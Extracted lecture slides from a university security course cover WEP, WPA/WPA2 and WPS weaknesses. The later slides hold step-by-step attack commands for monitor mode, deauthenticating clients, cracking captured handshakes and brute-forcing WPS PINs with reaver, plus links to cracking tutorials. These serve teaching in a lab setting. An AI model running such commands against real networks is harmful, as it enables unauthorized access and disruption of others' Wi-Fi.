Attacks

WEP

Authentication

Encryption

Vulnerabilities

WPA/WPA2

Authentication

Encryption

Vulnerabilities

Passwordstrength

WPS

Wireless Security

Comp Sci 3600 Security

Attacks

WEP

Authentication

Encryption

Vulnerabilities

WPA/WPA2

Authentication

Encryption

Vulnerabilities

Passwordstrength

WPS

Outline

1 Attacks

2 WEPAuthenticationEncryptionVulnerabilities

3 WPA/WPA2AuthenticationEncryptionVulnerabilities

Password strengthWPS

Attacks

WEP

Authentication

Encryption

Vulnerabilities

WPA/WPA2

Authentication

Encryption

Vulnerabilities

Passwordstrength

WPS

Wired versus wireless

Figure 24.1 Wireless Networking Components

Endpoint Access point

Attacks

WEP

Authentication

Encryption

Vulnerabilities

WPA/WPA2

Authentication

Encryption

Vulnerabilities

Passwordstrength

WPS

Locations and types of attack

Attacks

WEP

Authentication

Encryption

Vulnerabilities

WPA/WPA2

Authentication

Encryption

Vulnerabilities

Passwordstrength

WPS

Outline

1 Attacks

2 WEPAuthenticationEncryptionVulnerabilities

3 WPA/WPA2AuthenticationEncryptionVulnerabilities

Password strengthWPS

Attacks

WEP

Authentication

Encryption

Vulnerabilities

WPA/WPA2

Authentication

Encryption

Vulnerabilities

Passwordstrength

WPS

Wired Equivalent Privacy (WEP)

• Security algorithm for IEEE 802.11 wireless networks

• Part of the original 802.11 standard ratified in 1997

• WEP is recognizable by its key of 10 or 26 hexadecimaldigits (40 or 104 bits), and was at one time widely in useand was often the first security choice presented to usersby router configuration tools.

• C: encrypted

• I: data integrity check

• A: passphase authentication

Attacks

WEP

Authentication

Encryption

Vulnerabilities

WPA/WPA2

Authentication

Encryption

Vulnerabilities

Passwordstrength

WPS

Outline

1 Attacks

2 WEPAuthenticationEncryptionVulnerabilities

3 WPA/WPA2AuthenticationEncryptionVulnerabilities

Password strengthWPS

Attacks

WEP

Authentication

Encryption

Vulnerabilities

WPA/WPA2

Authentication

Encryption

Vulnerabilities

Passwordstrength

WPS

WEP authentication

Attacks

WEP

Authentication

Encryption

Vulnerabilities

WPA/WPA2

Authentication

Encryption

Vulnerabilities

Passwordstrength

WPS

WEP authentication

1 A wireless host requests authentication by an access point.

2 The access point responds to the authentication requestwith a 128-byte nonce value.

3 The wireless host encrypts the nonce using the symmetrickey that it shares with the access point.

4 The access point decrypts the host-encrypted nonce.

Attacks

WEP

Authentication

Encryption

Vulnerabilities

WPA/WPA2

Authentication

Encryption

Vulnerabilities

Passwordstrength

WPS

Outline

1 Attacks

2 WEPAuthenticationEncryptionVulnerabilities

3 WPA/WPA2AuthenticationEncryptionVulnerabilities

Password strengthWPS

Attacks

WEP

Authentication

Encryption

Vulnerabilities

WPA/WPA2

Authentication

Encryption

Vulnerabilities

Passwordstrength

WPS

WEP RC4

Attacks

WEP

Authentication

Encryption

Vulnerabilities

WPA/WPA2

Authentication

Encryption

Vulnerabilities

Passwordstrength

WPS

WEP RC4

Attacks

WEP

Authentication

Encryption

Vulnerabilities

WPA/WPA2

Authentication

Encryption

Vulnerabilities

Passwordstrength

WPS

WEP RC4 encryption

Attacks

WEP

Authentication

Encryption

Vulnerabilities

WPA/WPA2

Authentication

Encryption

Vulnerabilities

Passwordstrength

WPS

WEP RC4 decryption

Attacks

WEP

Authentication

Encryption

Vulnerabilities

WPA/WPA2

Authentication

Encryption

Vulnerabilities

Passwordstrength

WPS

WEP RC4 summary

1 First a 4-byte cyclic redundancy check value is computedfor the data payload.

2 Key value (in this case, the 64-bit (KS , IV) key), 40 bitsshared, IV is 24 bits

3 RC4 algorithm produces a stream of key values,k IV1 , k IV2 , k IV3 , ... that are used to encrypt the data andCRC value in a frame.

Attacks

WEP

Authentication

Encryption

Vulnerabilities

WPA/WPA2

Authentication

Encryption

Vulnerabilities

Passwordstrength

WPS

Encryption and Decryption

• Encryption is performed by XOR-ing the ith byte of data,di , with the ith key, k IVi , in the stream of key valuesgenerated by the (KS , IV ) pair to produce the ith byte ofciphertext, ci :

ci = di ⊕ k IVi• The IV value changes from one frame to the next and is

included in plaintext in the header of each WEP-encrypted802.11 frame (previous slide)

• The receiver takes the secret 40-bit symmetric key that itshares with the sender, appends the IV, and uses theresulting 64-bit key (which is identical to the key used bythe sender to perform encryption) to decrypt the frame:

di = ci ⊕ k IVi

Attacks

WEP

Authentication

Encryption

Vulnerabilities

WPA/WPA2

Authentication

Encryption

Vulnerabilities

Passwordstrength

WPS

Outline

1 Attacks

2 WEPAuthenticationEncryptionVulnerabilities

3 WPA/WPA2AuthenticationEncryptionVulnerabilities

Password strengthWPS

Attacks

WEP

Authentication

Encryption

Vulnerabilities

WPA/WPA2

Authentication

Encryption

Vulnerabilities

Passwordstrength

WPS

Flaw 1: keystream re-use

• Proper use of the RC4 algorithm requires that the same64-bit key value never be used more than once. Recallthat the WEP key changes on a frame-by-frame basis.

• For a given KS (which changes rarely, if ever), this meansthat there are only 224 unique keys.

• If these keys are chosen randomly, the probability of havingchosen the same IV value (and hence used the same 64-bitkey) is more than 99 percent after only 12,000 frames.

• With 1 Kbyte frame sizes and a data transmission rate of11 Mbps, only a few seconds are needed before 12,000frames are transmitted.

• Since the IV is transmitted in plaintext in the frame, aneavesdropper will know whenever a duplicate IV value isused.

• Two frames that use the same IV likely use the samesecret key and thus keystream

Attacks

WEP

Authentication

Encryption

Vulnerabilities

WPA/WPA2

Authentication

Encryption

Vulnerabilities

Passwordstrength

WPS

More flaws

• Cyclic redundancy check is not cryptographically secure:an attacker who changes the encrypted content (e.g.,substituting gibberish for the original encrypted data),computes a CRC over the substituted gibberish, andplaces the CRC into a WEP frame can produce an 802.11frame that will be accepted by the receiver.

• Weak keys are often chosen

• PRNG bad too

Attacks

WEP

Authentication

Encryption

Vulnerabilities

WPA/WPA2

Authentication

Encryption

Vulnerabilities

Passwordstrength

WPS

https://en.wikipedia.org/wiki/Aircrack-ng

Let’s check out a practical attack using our Kali VMs• https:

//kalitutorials.wordpress.com/2014/07/10/wifi-hack-crack-wep-passwords-with-kali/

• http://www.wirelesshack.org/

step-by-step-kali-linux-and-wireless-hacking-basics-wep-hacking-part-3.html

• https://www.hackingloops.com/crack-wep-wifi-using-kali-linux/

• https://teachmehacking.com/aircrack-ng-hack-wifi/

• http://ultimatepeter.com/hacking-wifi-cracking-wep-with-kali-linux/

• https:

//lifehacker.com/5305094/how-to-crack-a-wi-fi-networks-wep-password-with-backtrack

Attacks

WEP

Authentication

Encryption

Vulnerabilities

WPA/WPA2

Authentication

Encryption

Vulnerabilities

Passwordstrength

WPS

Outline

1 Attacks

2 WEPAuthenticationEncryptionVulnerabilities

3 WPA/WPA2AuthenticationEncryptionVulnerabilities

Password strengthWPS

Attacks

WEP

Authentication

Encryption

Vulnerabilities

WPA/WPA2

Authentication

Encryption

Vulnerabilities

Passwordstrength

WPS

WPA and WPA2

• WPA (sometimes referred to as the draft IEEE 802.11istandard) became available in 2003.

• The Wi-Fi Alliance intended it as an intermediate measurein anticipation of the availability of the more secure andcomplex WPA2, which became available in 2004 and is acommon shorthand for the full IEEE 802.11i (or IEEE802.11i-2004) standard.

Attacks

WEP

Authentication

Encryption

Vulnerabilities

WPA/WPA2

Authentication

Encryption

Vulnerabilities

Passwordstrength

WPS

Outline

1 Attacks

2 WEPAuthenticationEncryptionVulnerabilities

3 WPA/WPA2AuthenticationEncryptionVulnerabilities

Password strengthWPS

Attacks

WEP

Authentication

Encryption

Vulnerabilities

WPA/WPA2

Authentication

Encryption

Vulnerabilities

Passwordstrength

WPS

Authentication

1 WPA-personal: Also referred to as WPA-PSK (pre-sharedkey) mode, this is designed for home and small officenetworks and doesn’t require an authentication server

2 WPA-enterprise: Also referred to as WPA-802.1X mode,and sometimes just WPA (as opposed to WPA-PSK), thisis designed for enterprise networks and requires a RADIUSauthentication server. This requires a more complicatedsetup, but provides additional security (e.g. protectionagainst dictionary attacks on short passwords).

3 Wi-Fi protected Setup (WPS): This is an alternativeauthentication key distribution method intended tosimplify and strengthen the process, but which, as widelyimplemented, creates a major security hole via WPS PINrecovery.

Attacks

WEP

Authentication

Encryption

Vulnerabilities

WPA/WPA2

Authentication

Encryption

Vulnerabilities

Passwordstrength

WPS

Authentication

• After the PSK or 802.1X authentication, a shared secretkey is generated, called the Pairwise Master Key (PMK).

• The PMK is derived from a password that is put throughPBKDF2-SHA1 as the cryptographic hash function.

• In a pre-shared-key network, the PMK is actually the PSK.

• If an 802.1X EAP exchange was carried out, the PMK isderived from the EAP parameters provided by theauthentication server.

Attacks

WEP

Authentication

Encryption

Vulnerabilities

WPA/WPA2

Authentication

Encryption

Vulnerabilities

Passwordstrength

WPS

Authentication (PSK mode)

Attacks

WEP

Authentication

Encryption

Vulnerabilities

WPA/WPA2

Authentication

Encryption

Vulnerabilities

Passwordstrength

WPS

Authentication (PSK mode)

Attacks

WEP

Authentication

Encryption

Vulnerabilities

WPA/WPA2

Authentication

Encryption

Vulnerabilities

Passwordstrength

WPS

Authentication (PSK mode)

Attacks

WEP

Authentication

Encryption

Vulnerabilities

WPA/WPA2

Authentication

Encryption

Vulnerabilities

Passwordstrength

WPS

Outline

1 Attacks

2 WEPAuthenticationEncryptionVulnerabilities

3 WPA/WPA2AuthenticationEncryptionVulnerabilities

Password strengthWPS

Attacks

WEP

Authentication

Encryption

Vulnerabilities

WPA/WPA2

Authentication

Encryption

Vulnerabilities

Passwordstrength

WPS

Encryption

• TKIP (Temporal Key Integrity Protocol): The RC4stream cipher is used with a 128-bit per-packet key,meaning that it dynamically generates a new key for eachpacket. This is used by WPA.

• CCMP (CTR mode with CBC-MAC Protocol): Theprotocol used by WPA2, based on the AdvancedEncryption Standard (AES) cipher along with strongmessage authenticity and integrity checking is significantlystronger in protection for both privacy and integrity thanthe RC4-based TKIP that is used by WPA. Informal namesare ”AES” and ”AES-CCMP

Attacks

WEP

Authentication

Encryption

Vulnerabilities

WPA/WPA2

Authentication

Encryption

Vulnerabilities

Passwordstrength

WPS

AES: CTR mode (nonce is IV here)

Attacks

WEP

Authentication

Encryption

Vulnerabilities

WPA/WPA2

Authentication

Encryption

Vulnerabilities

Passwordstrength

WPS

CBC-MAC

To calculate the CBC-MAC of message m one encrypts m inCBC mode with zero initialization vector. Blocksm1||m2||...||mx using a secret key k and a block cipher E :

Attacks

WEP

Authentication

Encryption

Vulnerabilities

WPA/WPA2

Authentication

Encryption

Vulnerabilities

Passwordstrength

WPS

Outline

1 Attacks

2 WEPAuthenticationEncryptionVulnerabilities

3 WPA/WPA2AuthenticationEncryptionVulnerabilities

Password strengthWPS

Attacks

WEP

Authentication

Encryption

Vulnerabilities

WPA/WPA2

Authentication

Encryption

Vulnerabilities

Passwordstrength

WPS

Vulnerabilities

These come in two main categories

1 Exploits on proper function which has been mis-managedby the user

• Weak password

2 Actual flaws/bugs to be exploited• WPA packet spoofing and decryption• WPS pin recovery• MS-CHAPv2 design weakness• Shared Group Temporal Key (GTK) flaw (hole196)• Lack of forward secrecy (e.g., no use of DH)• Predictable Group Temporal Key (GTK)• KRACK attack (a replay attack)

Attacks

WEP

Authentication

Encryption

Vulnerabilities

WPA/WPA2

Authentication

Encryption

Vulnerabilities

Passwordstrength

WPS

Attack on WPA/WPA2 weak passwords

1 Kick someone off their network

2 Capture the traffic when they perform their 4-wayhandshake, which contains a hash of the password

3 Crack the password offline using a dictionary, rainbowtable, or brute force

• https://geekviews.tech/aircrack-ng-tutorial/

• https://null-byte.wonderhowto.com/how-to/

hack-wi-fi-cracking-wpa2-psk-passwords-using-aircrack-ng-0148366/

Attacks

WEP

Authentication

Encryption

Vulnerabilities

WPA/WPA2

Authentication

Encryption

Vulnerabilities

Passwordstrength

WPS

Attack on WPA/WPA2 weak passwords

• Setup and choose network

• airmon-ng start wlan0 # put wlan0 in monitor mode• airodump-ng wlan0mon # check out networks

• Capture traffic on network of interest

• airodump-ng -c 11 bssid 00:07:26:47:B0:35 -w capfilewlan0mon # capture traffic

• Deauthenticate (kick off) – these are ALTERNATIVES

• aireplay-ng deauth 4 -a 00:07:26:47:B0:35 wlan0mon• mdk3 wlan0mon d -b 00:07:26:47:B0:35 -c 4• aireplay-ng ignore-negative-one -0 10 -a ’AP MAC’ -c

’Client MAC’ wlan0mon

• Crack capfile offline – these are ALTERNATIVES

• aircrack-ng -b 00:07:26:47:B0:35 capfile.cap -w/usr/share/john/password.lst #dictionary

• cowpatty -r acm dictionary-01.cap d dictionary hash sdictionary #rainbow-table

• john -stdout -incremental:all — aircrack-ng -b00:1a:c4:51:3c:31 -w acm dictionary-01.cap #brute force

Attacks

WEP

Authentication

Encryption

Vulnerabilities

WPA/WPA2

Authentication

Encryption

Vulnerabilities

Passwordstrength

WPS

Wifi Protected Setup

• Created by the Wi-Fi Alliance and introduced in 2006, thegoal of the protocol is to allow home users who know littleof wireless security and may be intimidated by theavailable security options to set up Wi-Fi ProtectedAccess, as well as making it easy to add new devices to anexisting network without entering long passphrases.

• When an enrollee attempts to gain access using a PIN, theregistrar reports the validity of the first and second halvesof the PIN separately.

• Since the first half of the pin consists of four digits(10,000 possibilities) and the second half has only threeactive digits (1000 possibilities), at most 11,000 guessesare needed before the PIN is recovered.

Attacks

WEP

Authentication

Encryption

Vulnerabilities

WPA/WPA2

Authentication

Encryption

Vulnerabilities

Passwordstrength

WPS

Wifi Protected Setup attack software

• Reaver (online/realtime attack)https://code.google.com/archive/p/reaver-wps/wikis/README.wiki

• Bully (online/realtime attack)https://null-byte.wonderhowto.com/how-to/

hack-wi-fi-breaking-wps-pin-get-password-with-bully-0158819/

https://tools.kali.org/wireless-attacks/bully

• PixieWPS (offline attack specific to some vendors) in combination withReaver or Bully https://github.com/wiire-a/pixiewps

Attacks

WEP

Authentication

Encryption

Vulnerabilities

WPA/WPA2

Authentication

Encryption

Vulnerabilities

Passwordstrength

WPS

Wifi Protected Setup: Reaver steps

ifconfig # see your interface nameairmon-ng start wlan0 # or your interface nameairodum-ng wlan0mon # to see networkswash -i wlan0mon # to see WPS networks onlyreaver -i wlan0mon –bssid 00:01:02:03:04:05 # the good stuff

# If you get rate-limited, there are many further options# You can also change your MAC first, but it needs to bespecified in Reaver execution as a flag